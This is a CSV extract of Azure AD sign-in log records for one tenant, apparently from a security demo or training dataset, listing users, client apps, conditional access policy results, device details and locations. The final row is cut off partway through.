+456,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:09.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,89f5d2f2-2851-4954-9b8e-cc258cb2498e,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}]",notApplied,09/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",a9f59943-bd83-455b-86cd-4cf1301e1b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,a9f59943-bd83-455b-86cd-4cf1301e1b00,SigninLogs,Sucess,50.6406517,5.572050095
+457,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,77382391-98ca-42e2-b85b-bc435603ac00,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",581df607-a3b5-4d26-ad1e-df5262d21800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,581df607-a3b5-4d26-ad1e-df5262d21800,SigninLogs,Sucess,33.7984581,-84.38828278
+458,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:29.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,51afd90b-5616-491f-8854-6354a50df91a,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",71d7ba06-8885-45d4-a319-08fc8d491700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,71d7ba06-8885-45d4-a319-08fc8d491700,SigninLogs,Sucess,33.7984581,-84.38828278
+459,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,38:42.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3f1faf80-febb-4cf8-92ee-c0da166d7d2e,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:38,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",bb151037-c810-45a4-b0e0-68cfcd300000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,bb151037-c810-45a4-b0e0-68cfcd300000,SigninLogs,Sucess,32.32146072,34.85319901
+460,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:12.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1f2e17e-30b6-4474-baa7-f2318e7976fa,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:01,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Edge 80.0.361', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f0214e47-f9bb-4b81-aab4-2b719cda0000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f0214e47-f9bb-4b81-aab4-2b719cda0000,SigninLogs,Sucess,32.32146072,34.85319901
+461,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:48.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,f5b32424-e485-4198-a589-3641f80b9477,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",ad1175c1-f0b5-45dc-98ba-8a7de6c42100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ad1175c1-f0b5-45dc-98ba-8a7de6c42100,SigninLogs,Failed,47.68061829,-122.1869888
+462,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,76de5006-710b-4e5f-8c8f-93d71f6d4a49,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4d916265-6489-4572-bed8-58616f0d1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4d916265-6489-4572-bed8-58616f0d1a00,SigninLogs,Sucess,36.6404686,-78.26995087
+463,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:07.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c1f2e17e-30b6-4474-baa7-f2318e7976fa,Microsoft.aadiam,Microsoft.aadiam,,Yaniv Shasha,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 18:01,"{'operatingSystem': 'Windows 10', 'deviceId': '186ef690-f143-49cd-9d77-bcb2bdc8f0ef', 'browser': 'Edge 80.0.361', 'displayName': 'YANIVSH-SU', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",9c4099ed-f52f-4189-99d1-f7c426a50000,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},Yaniv Shasha,4daf13e6-b859-4673-a823-01853ff28370,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,9c4099ed-f52f-4189-99d1-f7c426a50000,SigninLogs,Sucess,32.32146072,34.85319901
+464,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:29.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': 